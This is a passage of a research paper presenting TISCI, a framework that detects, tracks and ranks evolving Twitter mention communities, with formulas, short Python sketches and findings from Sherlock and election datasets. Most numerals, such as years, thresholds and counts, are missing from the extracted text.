arbitrary topics are of interest. both of the aforementioned frameworks present an abundance of statistics for individual users but contrary to our method, they do not take into account the communities created by these users or the evolution of these communities. greene, doyle & cunningham ( ) presented a method in which they use regular fortnight time intervals to sample a mobile phone network in a two month period and extract the communities created between the users of the network. although the network selected is quite large and the method is also very fast; the system was created in order to be applied on a mobile phone network which renders it quite different to the networks studied in this paper. 
the collected data lack the topic of discussion and the content of the messages between users, so there is no way to discover the reason for which a community was transformed or the effect that the transformation really had on the topic of that community. moreover, although the features of persistence and stability are mentioned in the paper, no effort was made in ranking the communities. nonetheless, due to its speed and scalability advantages, in this paper we decided to employ and extend their method by introducing a couple of optimization tweaks which render it suitable for large scale applications such as the analysis of an osn. finding the optimal match between communities in different timeslots was proposed in tantipathananandh, berger-wolf & kempe ( ), where the dynamic community detection approach was framed as a graph-coloring problem. since the problem is np- hard, the authors employed a heuristic technique that involved greedily matching pairs of node-sets in between timeslots, in descending order of similarity. although this technique konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. has shown to perform well on a number of small well-known social network datasets such as the southern women dataset, as the authors state in the paper, it does not support the identification of dynamic events such as community merging and splitting thus losing significant information which is of utmost importance in the proposed ranking framework which heavily relies on the content and context of the tweets. takaffoli et al. ( ) considered the context of the enron ( email addresses in the last year from the original dataset) and dblp (three conferences from to ) datasets for evaluation purposes, but similar to greene, doyle & cunningham ( ) they also studied the context independently of community evolution. they focused on the changes in community evolution and the aver- age topic continuation with respect to changes in the similarity threshold. the analyzed data presented valuable information as to how to select the similarity threshold but no insight as to important communities, their users or specific topics. another dynamic community detection method used to extract trends was introduced by cazabet et al. ( ). they created an evolving network of terms, which is an abstraction of the complete network, and then applied a dynamic community detection algorithm on this evolving network in order to discover emerging trends. although the algorithm is very effective for locating trends, it does not consider the interactions made between various users or the evolution of the communities. the work by lin, sundaram & kelliher ( ) bears some similarities in terms of motivation as they also want to gain insights into large-scale involving networks. they do this via extracting themes (concepts) and associating them with users and activities (e.g., commenting) and then try to study their evolution. however, they provide no way of ranking the extracted themes, which is the focus of our work. one of the main problems in detecting influential communities in temporal networks is that most of the time they are populated with a large amount of outliers. while tackling the problem of dynamic network summarization, qu et al. ( ) capture only the few most interesting nodes or edges over time, and they address the summarization problem by finding interestingness-driven diffusion processes. ferlez et al. 
( ) proposed timefall which performs time segmentation using cut- points, community detection and community matching across segments. despite the fact that they do not rank the communities, the proposed scheme could be employed to extract and detect evolving communities which would in turn be ranked by the tisci framework. in mucha et al. ( ), the concept of multiplex networks is introduced via the extension of the popular modularity function and by adapting its implicit null model to fit a layered network. here, each layer is represented with a slice. each slice has an adjacency matrix describing connections between nodes which belong to the previously considered slice. essentially, they perform community detection on a network of networks. although these frameworks technically require a network to be node-aligned (all nodes appear in all layers/timeslots), they have been used explicitly to consider relatively small networks in which that is not the case by using zero-padding. however, this creates a huge overhead in osns since the majority of users does not appear in every timeslot. in addition, mucha et konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al. ( ) do not provide any method for the ranking of the extracted communities, which is the focus of this paper. a method for ranking communities, specifically quasi-cliques, was proposed by xiao et al. ( ) in which they rank the respective cliques in respect to their betweeness centrality. however, they also do not take temporal measures into consideration and apply their method on a call graph from a telecom carrier and a collaboration network of co-authors thus excluding the context of the messages. the most recent work regarding the extraction of information using evolving communities was presented in lu & brelsford ( ) which studied the behavior of people discussing the japanese earthquake and tsunami. although they did rank the static communities by size, the evolution regarded only the before and after periods, so no actual dynamic community ranking was performed. osn analysis framework osn applications comprise a large number of users that can be associated to each other through numerous types of interaction. graphs provide an elegant representation of data, containing the users as their vertices and their interactions (e.g., mentions, citations) as edges. edges can be of different types, such as simple, weighted, directed and multiway (i.e., connecting more than two entities) depending on the network creation process. notation in this paper, we employ the standard graph notation g=(v,e,w), where g stands for the whole network; v stands for the set of all vertices and e for the set of all edges. in particular, we use lowercase letters (x) to represent scalars, bold lowercase letters (x) to represent vectors, and uppercase letters (x) to represent matrices. a subscript n on a variable (xn) indicates the value of that variable at discrete time n. we use a snapshot graph to model interactions at a discrete time interval n. in gn, each node vi ∈vn represents a user and each edge eij ∈en is associated with a directed weight wij corresponding to the frequency of mentions between vi and vj. the interaction history is represented by a sequence of graph snapshots 〈g ,g ,...,gn,...〉. a community ci,n which belongs to the set of communities c = { c , ,...,ci,n,... 
is defined here as a subgraph comprising a subset $v_{comm} \subseteq v$ of nodes such that connections between the nodes are denser than connections with the rest of the network. a dynamic community $t_{i,n}$, which belongs to the set $t = \{t_{1,1}, \ldots, t_{i,n}, \ldots\}$ of time-evolving communities, is defined as a series of subgraphs that consist of subsets of all the nodes in $v$ and the set of interactions among the nodes in these subsets that occur within a set of $n$ timeslots.
framework description
this section describes the proposed framework in three parts: community detection, community evolution detection and ranking. figure illustrates all the steps of the proposed framework.
figure : block diagram of the proposed framework. twitter data (mentions, hashtags, urls and text in time) pass through pre-processing (information extraction), temporal data discretization and temporal adjacency matrix formation, followed by community detection (infomap), community evolution detection, and ranking and information fusion based on persistence x stability, textual diversity, centrality, the theseus coefficient and community size; the outcome comprises dyccos (json) with popular hashtags, urls, textual content, the most influential users and community sizes.
interaction data discretization and graph creation
the tweet timestamp and a corresponding sampling frequency are used to group the interactions into timeslots. the selection of the time granularity (inverse sampling frequency) for each network is based on the change in activity. the aim is to create clear sequential graph snapshots of the network, as presented in fig. . the sampling time should be meaningful on its own (hours, days) but also individually for each case. for example, for the greek election and sherlock series datasets, a -hour period was selected to detect day-by-day changes to the flourishing discussions during the anticipation period of the corresponding events (election day, episode broadcasting) and the post-event reactions. the -hour period, in conjunction with the deep search performed during the evolution detection process, allows the framework to discover persistent communities over a one-week time-frame.
figure : referencing frequency activity for the four networks. (a) january greek elections, (b) september greek elections, (c) us elections and (d) bbc's sherlock series.
every node in the resulting graphs represents a twitter user who communicated tweets in the datasets by mentioning or being mentioned. a mention, and thus a directed edge between two users, is formed when one of the two creates a reference to the other in his/her posted content via use of the @ symbol. the number of mentions between them forms the edge weight.
community detection
given a social network, a community can be defined as a subgraph comprising a set of users that are typically associated through a common element of interest. this element can be as varied as a topic, a real-world person, a place, an event, an activity or a cause (papadopoulos et al., ). we expect to discover such communities by analyzing mention networks on twitter. there is considerable work on the topic and a host of different community detection approaches appear in the literature (fortunato, ; papadopoulos et al., ).
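a minimal sketch of the discretization and graph-creation step described above, assuming a list of tweet records with hypothetical field names ("created_at", "author", "mentions") and a caller-chosen sampling granularity; it is an illustration of the idea, not the authors' implementation:

```python
from collections import defaultdict
from datetime import datetime, timedelta

import networkx as nx

def build_snapshots(tweets, start, granularity_hours=3):
    """group mention interactions into timeslots and build one weighted,
    directed snapshot graph per timeslot."""
    slot = timedelta(hours=granularity_hours)
    # edge weights per timeslot: (author, mentioned user) -> number of mentions
    weights = defaultdict(lambda: defaultdict(int))
    for tw in tweets:
        ts = datetime.fromisoformat(tw["created_at"])  # hypothetical timestamp format
        n = int((ts - start) / slot)                   # timeslot index
        for target in tw.get("mentions", []):
            if target != tw["author"]:                 # self-mentions are discarded
                weights[n][(tw["author"], target)] += 1
    snapshots = {}
    for n, edges in sorted(weights.items()):
        g = nx.DiGraph()
        for (u, v), w in edges.items():
            g.add_edge(u, v, weight=w)                 # mention frequency as edge weight
        snapshots[n] = g
    return snapshots
```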
due to the nature of twitter mention networks, notably their sparsity and size, in this paper we apply the infomap method (rosvall & bergstrom, ) to detect the underlying community structures. infomap optimizes the map equation (rosvall, axelsson & bergstrom, ), which exploits the information-theoretic duality between the problem of compressing data and the problem of detecting and extracting significant patterns or structures within those data. the infomap method is essentially built on optimizing the minimum description length of a random walk on the network.
table : number of detected dynamic communities with and without the timeslot delay, for the louvain, newman and infomap methods on the us election, sherlock, january greek election and september greek election datasets.
the infomap scheme was selected for three reasons. first, according to lancichinetti & fortunato ( ) and granell et al. ( ) and our own preliminary results, infomap is very fast and outperforms even the most popular community detection methods such as louvain (blondel et al., ) and newman's modularity optimization technique (newman, ). further, its low computational complexity of o(m) (where m signifies the number of edges in a graph) encourages its use on graphs of large real networks. last, lu & brelsford ( ) used it in their experimental setup and as such it is suitable for comparative purposes. it should be noted that the focus of the framework is to rank the dynamic communities independently of the method used for their detection, and not to perform an exhaustive comparison of algorithms able to process dynamic networks. nonetheless, fig. as well as table provide support in favor of infomap in comparison to the louvain and newman methods, as infomap detects the most communities and significantly more from the middle region. figures c and d show the performance of the louvain and the modularity optimization techniques. they both seem to detect either very large or relatively small communities, which fall outside the middle section. the middle section poses the most interest for this study as it contains reasonably populated groups for the purposes of a discussion. in the future, it may be interesting to thoroughly investigate the sensitivity of the results with respect to the employed community detection method.
community evolution detection
the problem of finding communities in static graphs has been addressed by researchers for several years (blondel et al., ; newman, ; giatsoglou, chatzakou & vakali, ). however, the highly dynamic nature of osns has moved the spotlight to the subject of dynamic graph analysis (nguyen et al., ; asur, parthasarathy & ucar, ; giatsoglou & vakali, ; palla, barabasi & vicsek, ; takaffoli et al., ; roy chowdhury & sukumar, ). in this paper, we represent a dynamic network as a sequence of graph snapshots $\langle g_1, g_2, \ldots, g_n, \ldots \rangle$. the objective is to detect and extract dynamic communities t by identifying the communities c that are present in the network across a set of n timeslots and to create a container which includes a variety of metadata such as popular hashtags and urls, influential users and the posted text. a dynamic community is represented by the timeline of the communities of users that it comprises.
figure : community jaccard distance (similarity) over community size. results using the infomap (a, b), newman (c, d) and louvain (e, f) community detection algorithms for the bbc's sherlock series (a, c, e) and the us elections (b, d, f). the red dots signify the communities which were missed due to the absence of the time-delay search, whereas the blue ones signify commonly detected communities.
figure : population of matching nodes per timeslot for the sherlock dataset. (a) infomap with a threshold of . (tisci), (b) infomap with a threshold of . (lu & brelsford, ), (c) louvain with a threshold of . (greene, doyle & cunningham, ) and (d) newman with a threshold of . . every line is essentially a dynamic community.
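a sketch of the per-snapshot community detection step, assuming the python-igraph package and the networkx snapshot graphs from the previous sketch; it illustrates the use of infomap per timeslot rather than reproducing the authors' exact pipeline:

```python
import igraph as ig

def detect_communities(snapshots):
    """run infomap on every weighted, directed snapshot graph; returns, per
    timeslot, a list of communities represented as sets of user ids."""
    communities = {}
    for n, g in snapshots.items():
        users = list(g.nodes())
        index = {u: i for i, u in enumerate(users)}
        edges = [(index[u], index[v]) for u, v in g.edges()]
        weights = [g[u][v]["weight"] for u, v in g.edges()]
        h = ig.Graph(n=len(users), edges=edges, directed=True)
        clustering = h.community_infomap(edge_weights=weights)
        communities[n] = [
            {users[i] for i in cluster}
            for cluster in clustering
            if len(cluster) >= 3   # tiny groups are dropped later in the data processing step
        ]
    return communities
```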
the difference between sets c and t is that the former contains every static community in every available timeslot, whereas the latter contains sequences of communities that evolve through time. in both ci,n and ti,n, i is a counter of communities and dynamic communities respectively, while in ti,n in particular, n represents the timeslot of birth of the dynamic community. figure presents an example of the most frequent conditions that communities might experience: birth, death, irregular occurrences, merging and splitting, as well as growth and decay, which register when a significant percentage of the community population is affected. in the example of fig. , the behavior of six potential dynamic communities is studied over a period of three timeslots (n−1, n, n+1). dynamic community t ,n−x originated from a previous timeslot n−x and then split up into a fork formation in timeslot n. in t ,n−x, x is an integer-valued variable representing the timeslot delay, which can acquire a maximum value of d (x ≤ d ≤ n). the split indicates that for some reason the members of c ,n−1 broke up into two separate smaller groups in timeslot n, which also explains the change in size. in our case it could be that a large group of users engaged in conversation during n−1 but split up and are not cross-mentioning each other in n and n+1. moreover, although the second group (c ,n) instigated a new dynamic community t ,n, it continued its decaying activity for one more timeslot and then dispersed (community death). nonetheless, both are obviously important to the evolution of the community, and the separation is of great interest from a content point of view as to the ongoing user discussion and as to why the users actually split up. both questions can be answered by using the metadata stored in the container corresponding to the dynamic community. a dual example is that of t ,n−1 and t ,n−x, in which two communities started out weak and small but evolved through a merger into one very strong, large community that continues on to n+1. in this case it could be that two different groups of people witnessed the same event and began conversing on it separately. as time went by, connections were made between the two groups and in timeslot n they finally merged into one. in fact, the community continued to grow, as shown in the n+1 timeslot. t ,n−1 and tn/a were both created (community birth) in n−1 and both disappeared in n, differing in that t ,n−1 reappears in n+1 (irregular occurrence) while tn/a does not, and thus a dynamic community is not registered.
this is the main reason why a timeslot delay is introduced in the system, as will be described later; a search strictly between communities of consecutive timeslots would result in missing such re-occurrences. to study the various lifecycle stages of a community, the main challenge pertains to the computational process used to identify and follow the evolution of any given community. on the one hand, it should be able to effectively map every community to its corresponding timeline, and on the other hand it should impose as little computational burden as possible so as to be applicable to massive networks. however, community matching techniques presume a zero-to-one or one-to-one mapping between users in two communities, thus not supporting the identification of the above conditions in the lifecycle of a dynamic community. in order to overcome this predicament, we employ a heuristic by greene, doyle & cunningham ( ) relying on a user-defined threshold to determine the matching between communities across different timeslots. the algorithm steps are presented in more detail as follows. initially, the first set of communities $\{c_{1,1}, c_{2,1}, \ldots, c_{i,1}, \ldots, c_{k,1}\}$ (i.e., the first snapshot) is extracted by applying the infomap community detection algorithm (rosvall & bergstrom, ) to the $g_1$ graph. a dynamic community marker $t_{i,1}$ (where $i \in [1, k]$) is assigned to each community from this snapshot. next, the second set of communities is extracted from the $g_2$ graph and a matching process is performed between all the community combinations from the two consecutive snapshots in order to determine any possible evolution from the first snapshot to the next. the dynamic communities $t_{(1,2,\ldots,k)}$ are then updated based on that evolution. for example, if $c_a$ does not appear in the second snapshot, $t_{a,1}$ is not updated; a split is registered if the community appears twice in the new timeslot, and a merger marker is assigned if two or more communities seem to have merged into one. one of the problems community evolution detection processes face is the lack of consistency in the users' behavior. the lack of consistent and sequential behavior results in communities being labeled dead when in fact they could just be delayed. in order to avoid potential false positives of community deaths, a trail of several snapshots is retained, meaning that the search covers a wider range of timeslots in total instead of just the immediately previous one.
figure : a study of six potential dynamic communities tracked over three timeslots. the seven most frequent conditions that communities might experience are birth (concentric circles), death (no exiting arrow), irregular occurrences (skipped timeslot), merging and splitting, as well as growth and decay.
the length of the trail depends on the selected granularity of the discretization process, in a manner that covers a meaningful period (i.e., if the sampling is performed on a daily basis, the trail will consist of seven timeslots in order to provide a week's depth). hence, if the evolution of a community is not detected in the immediately preceding timeslot, the system queries the d previous ones in a ''last come, first served'' order. this means that the search progresses through the trail until a match is found, in which case the search is terminated and the dynamic community is observed to have skipped a timeslot. if no matching community is detected, the community is considered dead.
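a simplified sketch of the delayed matching search described above; the threshold and maximum delay values below are illustrative assumptions (the paper's actual values are not reproduced here), and split/merge events are not registered in this minimal version:

```python
def jaccard(a, b):
    """set similarity between two communities (sets of user ids)."""
    return len(a & b) / len(a | b)

def detect_evolution(communities, threshold=0.3, max_delay=2):
    """attach each community of timeslot n to the best-matching community of a
    previous timeslot (most recent first), otherwise start a new dynamic community."""
    dynamic = []  # each entry: {"birth": n0, "timeline": {n: set_of_users}}
    for n in sorted(communities):
        for comm in communities[n]:
            matched = False
            # ''last come, first served'': try n-1, then n-2, ... up to the delay d
            for td in range(1, max_delay + 1):
                prev = n - td
                candidates = [d for d in dynamic if prev in d["timeline"]]
                best = max(candidates,
                           key=lambda d: jaccard(comm, d["timeline"][prev]),
                           default=None)
                if best and jaccard(comm, best["timeline"][prev]) >= threshold:
                    best["timeline"][n] = comm
                    matched = True
                    break  # stop at the first (most recent) matching timeslot
            if not matched:
                dynamic.append({"birth": n, "timeline": {n: comm}})
    return dynamic
```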
the proof of the necessity for such a delay is shown in table . the evolution detection procedure is repeated until all graphs have been processed. it should be noted that the decision to set the delay to only a few timeslots instead of the whole trail was made by considering the computational burden of the system in conjunction with the fact that people lose interest. if the users comprising the community do not engage in the discussion for a significant period of time, it is safe to say that the community has been dismantled. in order to determine the matching between communities, the jaccard coefficient is employed (jaccard, ). following comparative preliminary results between the jaccard and the sorensen index (dice coefficient) (sørensen, ), the former was selected due to its efficiency. in fact, the jaccard similarity is still one of the most popular similarity measures in community matching (yang, mcauley & leskovec, ; alvarez, sanz-rodríguez & cabrera, ). the similarity between a pair of communities $c_{i,n}$ and $c_{i,(n-td)}$ is calculated with the following formula, where $td$ denotes the timeslot delay:
$$j\left(c_{i,n}, c_{i,(n-td)}\right) = \frac{\left|c_{i,n} \cap c_{i,(n-td)}\right|}{\left|c_{i,n} \cup c_{i,(n-td)}\right|}.$$
if the similarity exceeds a matching threshold $\varphi$, the pair is matched and $c_{i,n}$ is added to the timeline of the $t_{i,n}$ dynamic community. as in greene, doyle & cunningham ( ), takaffoli et al. ( ) and lu & brelsford ( ), the similarity threshold $\varphi$ is a constant. following a more extensive analysis of the impact of the threshold selection, greene suggested the use of . , which concurs with our own results. figure illustrates that . allows the creation of many strings of small communities, whereas . suppresses a lot of communities from the middle region, which holds most of the information required for a fuller investigation.
dynamic community ranking using tisci
although the evolution detection algorithm is efficient enough to identify which communities are resilient to the passing of time, it does not provide a measure as to which communities are worth looking into and which are not. a solution to this shortcoming is presented here via the tisci score, which ranks the evolving communities on the basis of seven distinct features representing the notions of time, importance, structure, context and integrity. specifically, we employ persistence and stability, which are temporal measures; normalized community centrality, which is a relational importance measure; community size, which is a structural measure; mean textual entropy and unique-url average, which are contextual measures; and an integrity coefficient inspired by the ''ship of theseus'' paradox. persistence is defined as the characteristic of a dynamic community to make an appearance in as many timeslots as possible (i.e., overall appearances/total number of timeslots), and stability as the ability to appear in as many consecutive timeslots as possible, disregarding the total number of appearances (i.e., overall consecutive appearances/total number of timeslots):
$$persistence(t_{x,y}) = \frac{\sum_{n=1}^{m} \delta[a[n]]}{m} \qquad stability(t_{x,y}) = \frac{\sum_{n=2}^{m} \delta[a[n] - a[n-1]]}{m-1}$$
where $\delta$ is the impulse function, $m$ represents the total number of timeslots, $x, y$ are the labels of the oldest community in $t_{x,y}$ and
$$a[n] = \begin{cases} 1 & \forall\, c_{i,n} \in t_{x,y} \\ 0 & \text{otherwise.} \end{cases}$$
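a small sketch of the two temporal features, following the verbal definitions above (appearances per timeslot and consecutive co-appearances) and the dynamic-community structure assumed in the earlier sketches:

```python
def appearance_vector(dyn_comm, m):
    """a[n] = 1 if the dynamic community has a member community in timeslot n, else 0."""
    return [1 if n in dyn_comm["timeline"] else 0 for n in range(m)]

def persistence(dyn_comm, m):
    a = appearance_vector(dyn_comm, m)
    return sum(a) / m  # overall appearances / total number of timeslots

def stability(dyn_comm, m):
    if m < 2:
        return 0.0
    a = appearance_vector(dyn_comm, m)
    # consecutive appearances, normalized by the number of timeslot transitions
    return sum(1 for n in range(1, m) if a[n] == 1 and a[n - 1] == 1) / (m - 1)
```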
we expect consistent dynamic communities to be both persistent and stable, as the combination of these features indicates either a continuous interest in a subject or its evolution into something new. as such, we combine the two features into one via multiplication. figure shows how stable and how persistent the communities are with respect to the actual number of persistent users. moreover, it shows the number of people who persist in time within a community with respect to the community's persistence and stability for the infomap as well as for the louvain and newman methods. google's pagerank (brin & page, ) is used as the centrality feature, which measures the number and quality of links to a community in order to estimate how important that community is. the same measure is also applied to the users of every dynamic community, ranking them according to their own centrality and thus providing the most influential users per timeslot. there is, however, a difference between the two in how the final centrality values are extracted, since different timeslots create different populations between the static graphs. although this does not affect the users' centralities, as they are compared to each other within the timeslot, it does influence the communities' centrality measures due to the difference in populations. in order to compare centrality measures from different timeslots, we employ the normalized pagerank solution proposed in berberich et al. ( ). the mean centrality as used here is defined as:
$$mc(t_{x,y}) = \frac{\sum_{n=1}^{m} \sum_{i=1}^{k} normpr(c_{i,n} \in t_{x,y})}{\sum_{n=1}^{m} \sum_{i=1}^{k} a[i,n]}$$
where $k$ is the number of communities per timeslot. one of the measures that provides a sense of popularity is virality, which in the case of twitter datasets translates into multiple bursts of mentions in a short time. this can happen either due to an event or because an influential user (e.g., a major newspaper account) posted something of interest. on the other hand, lu and brelsford used the lack of increased community size as an indication of disruption in telecommunication services. for this reason we consider the increased size of a dynamic community as a feature that requires attention. here, the feature of size is defined as the average size of the static communities that comprise it. the integrity measure employed is an extension of the ship of theseus coefficient. the ship of theseus, also known as theseus's paradox, is a thought experiment that raises the question of whether an object which has had all its components replaced remains fundamentally the same object (rea, ). we apply this theory to find out the transformation sustained by the dynamic community by calculating the number of consistent nodes within the communities, which represents the integrity and consistency of the dynamic community. twitter datasets differ quite a lot from other online social networks since the user is restricted to a limited number of characters of text. given this restriction, we assume that there is a connection between the entropy of the tweeted words used in a community (discarding urls, mentions, hashtags and stopwords), the effort the users put into posting those tweets, and the diversity of its content. whether there is a discussion between the users or a presentation of different events, high textual entropy implies a broader range of information and therefore more useful results.
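a sketch of the centrality feature; the size-based normalization used here is a simple stand-in assumption and not the exact normalized pagerank of berberich et al.:

```python
import networkx as nx

def mean_centrality(dyn_comm, snapshots):
    """average normalized pagerank mass of a dynamic community over the
    timeslots in which it appears."""
    total, appearances = 0.0, 0
    for n, members in dyn_comm["timeline"].items():
        g = snapshots[n]
        pr = nx.pagerank(g, weight="weight")
        # scale by graph size so that scores from snapshots with different
        # populations become roughly comparable (stand-in normalization)
        total += sum(pr.get(u, 0.0) for u in members) * len(g)
        appearances += 1
    return total / appearances if appearances else 0.0
```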
an added bonus of this feature is that spam and empty tweets containing only hashtags or mentions, as is the case in url attention-seeking tweets, rank even lower than communities containing normal retweets. for the ranking we employ the mean textual diversity of the dynamic community. the textual diversity in a community $c_i$ is measured by shannon's entropy $h$ of the text resulting from the tweets that appear in that community as follows:
$$h(c_i) = \sum_{m=1}^{k} -p(w_m)\log_2\!\left(p(w_m)\right)$$
where $p(w_m)$ is the probability of a word $w_m$ appearing in a community containing $M$ words and is computed as follows:
$$p(w_m) = \frac{freq(w_m)}{M}.$$
the second contextual feature to be employed regards the references cited by the users via urls in order to point out something they consider important or interesting. in fact, the urls hold a lot more information than a single tweet and as such we also consider them useful for discovering content-rich communities. the ranking in this case is performed by simply computing the average number of unique urls in each dynamic community over time. since we have an array of six features, we have to combine them into a single value in order to rank the dynamic communities. the final ranking measure for every dynamic community is extracted by employing the reciprocal rank fusion (rrf) method (cormack, clarke & buettcher, ); a preference aggregation method which essentially provides the sum of the reciprocal ranks of all the extracted aforementioned features $q$:
$$rrf = \sum_{q=1}^{|Q|} \frac{1}{\alpha + rank_q}$$
where $\alpha$ is a constant used to mitigate the impact of high rankings by outlier systems. cormack, clarke & buettcher ( ) set the constant to according to their needs, although the choice, as they state, is not critical, and thus we prefer a lower value equal to the number of dynamic communities to be considered. despite its simplicity, rrf has proven to perform better than many other methods such as the condorcet fuse or the well-established combmnz (cormack, clarke & buettcher, ) and is considered one of the best baseline consensus methods (volkovs, larochelle & zemel, ). in addition, it requires no special voting algorithm or global information, and the ranks may be computed and summed one system at a time, thus avoiding the need to keep all the rankings in memory. however, this preference aggregation method is not without flaws, as it could potentially hide correlations between feature ranks. although in other applications this could pose a problem, as shown in table the lack of correlation between the features' ranks encourages us to employ this simple but useful method. the correlation was measured using the spearman rank-order correlation coefficient.
table : feature ranking similarity comparison using spearman's rank correlation coefficient, averaged across all three datasets, between the centrality, perstability, size, textdiversity, theseus, urldiversity and tisci rankings.
complexity and scalability
when it comes to temporal interaction analysis, scalability is always an issue.
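a minimal sketch of the textual-entropy feature and the reciprocal rank fusion defined above; the value of alpha is left to the caller (the paper sets it to the number of dynamic communities considered), and the input structures are assumptions for illustration:

```python
import math
from collections import Counter

def textual_entropy(words):
    """shannon entropy (in bits) of a community's word distribution, computed
    after urls, mentions, hashtags and stopwords have been discarded upstream."""
    counts = Counter(words)
    total = sum(counts.values())
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def rrf_scores(feature_ranks, alpha):
    """reciprocal rank fusion: feature_ranks maps a feature name to a dict
    {community_id: rank}; returns the fused score per dynamic community."""
    scores = Counter()
    for ranks in feature_ranks.values():
        for comm, rank in ranks.items():
            scores[comm] += 1.0 / (alpha + rank)
    return dict(scores)
```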
the cost of the tisci framework is $o(m + k^2 + c \cdot w)$, where $m$ is the number of edges for the infomap method, $k$ is the number of communities in each row of the evolution detection scheme, and $c$ and $w$ are the numbers of dynamic communities and of words per community in the ranking stage. although currently the framework would not scale well due to the squared complexity of the evolution detection process, future work will involve the use of locality sensitive hashing to speed up the operation.
experimental study
despite the proliferation of dynamic community detection methods, there is still a lack of benchmark ground-truth datasets that could be used for testing the framework. instead, the results presented in this paper were attained by applying our framework on three twitter interaction network datasets, as described in the following section.
datasets
the tweets related to the us election of were collected using a set of filter keywords and hashtags chosen by experts (aiello et al., ). keywords and hashtags in greek and english containing all the greek party names as well as their leaders' names were used for the greek elections of . last, variations of the names 'sherlock' and 'watson' were used for the sherlock series dataset. we chose these three datasets as they all share a number of useful features but also have significant differences, as one may deduce from the data description and the basic network characteristics presented in table . on the one hand, all of the datasets regard major events that generate a large volume of communication and are mostly dominated by english-language contributors, making analysis simpler for the majority of researchers. on the other hand, the us election (including voting, vote counting, speculation about results and subsequent analysis) lasted two days, whereas the greek elections and the sherlock frenzy lasted days and two weeks, respectively. similarly, in an event-focused discussion such as the us election, almost all the focus is either on specific events/announcements or on specific people associated with the events, whereas topics in a general discussion regarding a fictitious character tend to be more spread out over time and to overlap with other topics, while becoming more active when specific events take place. these differences help us understand the ways in which social networks are used in very different circumstances, as well as that the variation in temporal structure depends heavily on the query itself.
table : dataset statistics for the sherlock, us election, gr election jan and gr election sep datasets: number of tweets, tweets with mentions, hashtags, urls, unique users, edges, communities, reduced communities, evolution steps, dynamic communities, and sampling time.
sherlock holmes dataset
this real-world dataset is a collection of mentioning posts acquired by a crawler that collected tweets containing keywords and hashtags which are variations of the names 'sherlock' and 'watson.' the crawler ran over a period of two weeks, from the st of december to the th of january , extracting messages containing mentions. the evolution detection process discovered , dynamic communities comprising , snapshot communities.
the information we sought pertained to the various communities created between people who interact via mentions and are interested in the bbc's sherlock series, people who are influenced by these communities, and any news that might give us more insight into this worldwide phenomenon. the dynamic community structure resulting from this dataset is totally different from the two election ones in more ways than one. initially, there are many diverse and smaller communities which persist over time and seem to be fairly detached from the rest. this means that the interest here is widely spread and the groups of people discussing the imminent or latest episode of the series are smaller, indicating that in most cases we are looking at friends chatting online. nonetheless, the user can still acquire a variety of information such as the general feeling of the viewers, several spoilers regarding each episode, a reminder about when each episode starts and on what day, and also statistics on the viewership of the series. the latter was extracted from one of the largest communities, which informed us that not only was the first episode viewed by an average of . million viewers, but also that chinese fans relish the series and especially the love theory between the two main characters (http://www.bbc.com/news/blogs-china-blog- ). other typical topics of conversation include the anticipation of the series, commentary regarding the quality of the episode, commentary regarding the character, and many more typical lines of discussion. a short list of findings is presented in table . interestingly, conversations and opinions regarding the bad habits or the sexuality of the character are pretty high in the rankings, and there are plenty of non-english speaking communities.
table : key findings from the sherlock dataset (finding; url if available):
• creators reveal they already have series four mapped out (https://goo.gl/ zdcmt)
• cumberbatch's parents make sherlock cameo (https://goo.gl/qpgtaj)
• chinese fans relish new sherlock gay love theory as fans relish new series
• episode scores highest timeshifted audience in uk tv history (https://goo.gl/pkfhjs)
• january th is sherlock's birthday
one last remark concerns the dycco (ranked # ) which contains a plethora of shopping labels. usually, consecutive shop labels are an indication of spam, as they are usually consistent, stable and contain urls whose sole purpose is to lure a potential customer. however, in this case the shopping-labeled communities contain references to books, movies and the original series of sherlock holmes sold by major retailers, thus classifying the dycco as one that a sherlock enthusiast would actually be interested in.
us election dataset
the united states presidential election of was held on november th. the respective dataset was collected by using a set of filter keywords and hashtags chosen by experts (aiello et al., ). despite retrieving tweets for specific keywords only, the data collected were still too large for a single user to organize and index in order to extract useful information. here, the granularity selection of three hours was made based on the fact that there is a discrete but not wild change in activity. employing a coarser granularity instead of an hourly one serves to reduce the time zone effect.
moreover, since all four political debates in lasted for an hour and a half, twice the span of a debate seemed like a reasonable selection for twitter users to engage in a political discussion. studying the top dyccos provides a variety of stories which contain not only mainstream news but also other, smaller pieces of information that journalists seek out. the first one for example, which is also the most heavily populated, regards a movement motivating women to voice their opinion by urging them to post photos of their ''best voting looks'', but also pleading for tony rocha (radio producer) to use his influence for one of the nominees. the first static community alone includes , people, some of which are @kalihawk, @lenadunham, @ammaasante, @marieclaire and others. overall, during election day people are mostly trying to collect votes for their candidate of choice, either by trying to inspire others themselves or by asking a celebrity to do so; whereas after the fact, everyone is either posting victory or hate posts, or commenting on what the election will bring the following day and on whether or not the election was falsified/rigged. at all times people are referencing a number of journalists, bloggers and politicians (herman cain, pat dollard) as well as various newspapers, tv channels and famous blogs. other examples include comments on racism stopping due to the reelection, a book on president obama, posts by a number of parishes and many more which unfortunately cannot be illustrated in this manuscript due to space restrictions. however, a short list of non-mainstream findings is presented in table . one of the main anticipated characteristics of this particular set is that the news media, political analysts, politicians and even celebrities are heavily mentioned in the event of an election.
table : key findings from the us election dataset (finding; url if available):
• women's voting motivational movement on instagram (https://goo.gl/oks u)
• president obama hoops with s. pippen on election day (https://goo.gl/ybg z)
• iran and russia among countries with messages for obama (https://goo.gl/hgiaan)
• mainstream media tipped the scales in favor of obama (foxnews, removed)
• anti-obama protests escalate at university (washpost, removed)
table : key findings from the greek elections datasets (finding; url if available):
• euro hits an -year low following the syriza party victory (removed)
• candidate slapped pollster over bad numbers announcement (removed)
• tsipras regains slim lead hours ahead of greek vote (https://goo.gl/fza ux)
• vandalisms at syriza and new democracy polling centers (https://goo.gl/ yefrp)
• far-right party is the most voted by the unemployed (https://goo.gl/ydzd r)
greek election datasets
the two greek elections of were held on january th and on september th, and the collection of the corresponding tweets was made using greek and english keywords, hashtags and user accounts of all major running parties and their leaders. although participation in the second election was almost cut in half with respect to the first, there are a few similarities in the dynamic communities that are of interest. the top dyccos of both datasets surfaced groups of an extremely wide and diverse background.
